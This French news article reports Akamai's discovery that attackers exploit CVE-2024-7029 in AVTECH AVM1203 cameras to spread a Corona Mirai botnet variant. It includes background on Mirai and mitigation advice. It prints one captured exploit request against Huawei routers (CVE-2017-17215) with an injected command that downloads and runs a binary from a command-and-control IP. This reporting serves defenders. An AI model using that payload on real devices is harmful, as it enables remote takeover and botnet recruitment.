Des pirates informatiques exploitent une vulnérabilité critique dans une caméra de sécurité largement utilisée pour diffuser Mirai, une famille de logiciels malveillants qui intègre des appareils IoT infectés dans de grands réseaux pour les utiliser dans des attaques visant à détruire des sites Web et d’autres appareils connectés à Internet.
Les attaques visent l’AVM1203, un dispositif de surveillance du fabricant taïwanais AVTECH, a indiqué mercredi le fournisseur de sécurité réseau Akamai. Des attaquants inconnus exploitent depuis mars une vulnérabilité vieille de cinq ans. La vulnérabilité zero-day, identifiée comme CVE-2024-7029, est facile à exploiter et permet aux attaquants d’exécuter du code malveillant. L’AVM1203 n’est plus vendu ni pris en charge, donc aucune mise à jour n’est disponible pour corriger cette vulnérabilité zero-day critique.
Cette fois où une armée hétéroclite a secoué Internet
Selon Akamai, les attaquants exploitent cette vulnérabilité pour installer une variante de Mirai, apparue en septembre 2016 lorsqu’un botnet d’appareils infectés a mis hors service le site d’actualités sur la cybersécurité Krebs on Security. Mirai contenait des fonctionnalités qui permettaient à une armée hétéroclite de webcams, routeurs et autres types d’appareils IoT compromis de lancer des attaques par déni de service distribué d’une ampleur record. Dans les semaines qui ont suivi, le botnet Mirai a lancé des attaques similaires contre des fournisseurs de services Internet et d’autres cibles. L’une de ces attaques, contre le fournisseur de noms de domaine dynamiques Dyn, a paralysé de vastes pans d’Internet. Pour compliquer les tentatives de contenir Mirai, ses créateurs ont rendu le malware public, une démarche qui a permis à pratiquement n’importe qui de créer ses propres botnets qui ont déclenché des attaques DDoS d’une ampleur autrefois inimaginable.
Kyle Lefton, chercheur en sécurité au sein de l’équipe de renseignement et de réponse en sécurité d’Akamai, a déclaré dans un e-mail avoir observé que l’acteur malveillant à l’origine des attaques effectuait des attaques DDoS contre « diverses organisations », qu’il n’a pas nommées ni décrites plus en détail. Jusqu’à présent, l’équipe n’a vu aucun signe indiquant que les acteurs malveillants surveillaient les flux vidéo ou utilisaient les caméras infectées à d’autres fins.
Akamai a détecté l’activité en utilisant un « honeypot » d’appareils qui imitent les caméras de l’Internet ouvert pour observer les attaques qui les ciblent. Cette technique ne permet pas aux chercheurs de mesurer la taille du botnet. L’Agence américaine de cybersécurité et de sécurité des infrastructures a mis en garde contre cette vulnérabilité au début du mois.
Cette technique a toutefois permis à Akamai de capturer le code utilisé pour compromettre les appareils. Elle cible une vulnérabilité connue depuis au moins 2019, date à laquelle le code d’exploitation est devenu public. La faille zero-day réside dans « l’argument de luminosité dans le paramètre ‘action=’ » et permet l’injection de commandes, ont écrit les chercheurs. La faille zero-day, découverte par la chercheuse d’Akamai Aline Eliovich, n’a été officiellement reconnue que ce mois-ci, avec la publication de CVE-2024-7029.
Le message de mercredi continuait ainsi :
Comment ça marche ?
Cette vulnérabilité a été découverte à l’origine en examinant nos journaux honeypot. La figure 1 montre l’URL décodée pour plus de clarté.
Charge utile décodéeFig. 1 : Corps de charge utile décodé des tentatives d’exploitation
La vulnérabilité réside dans la fonction de luminosité dans le fichier /cgi-bin/supervisor/Factory.cgi (Figure 2).
Que pourrait-il arriver ?
Dans les exemples d’exploitation que nous avons observés, voici ce qui s’est passé : l’exploitation de cette vulnérabilité permet à un attaquant d’exécuter du code à distance sur un système cible.
La figure 3 est un exemple d’acteur malveillant exploitant cette faille pour télécharger et exécuter un fichier JavaScript afin de récupérer et de charger sa principale charge utile de malware. Comme de nombreux autres botnets, celui-ci diffuse également une variante du malware Mirai à ses cibles.
Dans ce cas, le botnet utilise probablement la variante Corona Mirai, qui a été référencée par d’autres fournisseurs dès 2020 en relation avec le virus COVID-19.
Lors de son exécution, le malware se connecte à un grand nombre d’hôtes via Telnet sur les ports 23, 2323 et 37215. Il imprime également la chaîne « Corona » sur la console d’un hôte infecté (Figure 4).
L’analyse statique des chaînes dans les échantillons de malware montre que le chemin /ctrlt/DeviceUpgrade_1 est ciblé pour tenter d’exploiter les appareils Huawei affectés par CVE-2017-17215. Les échantillons ont deux adresses IP de commande et de contrôle codées en dur, dont l’une fait partie du code d’exploitation CVE-2017-17215 :
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: */* Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)
Le botnet a également ciblé plusieurs autres vulnérabilités, notamment une RCE Hadoop YARN, CVE-2014-8361 et CVE-2017-17215. Nous avons observé que ces vulnérabilités ont été exploitées dans la nature à plusieurs reprises et elles continuent à être efficaces.
Étant donné que ce modèle de caméra n’est plus pris en charge, la meilleure solution pour quiconque en utilise une est de la remplacer. Comme pour tous les appareils connectés à Internet, les appareils IoT ne doivent jamais être accessibles à l’aide des informations d’identification par défaut fournies avec eux.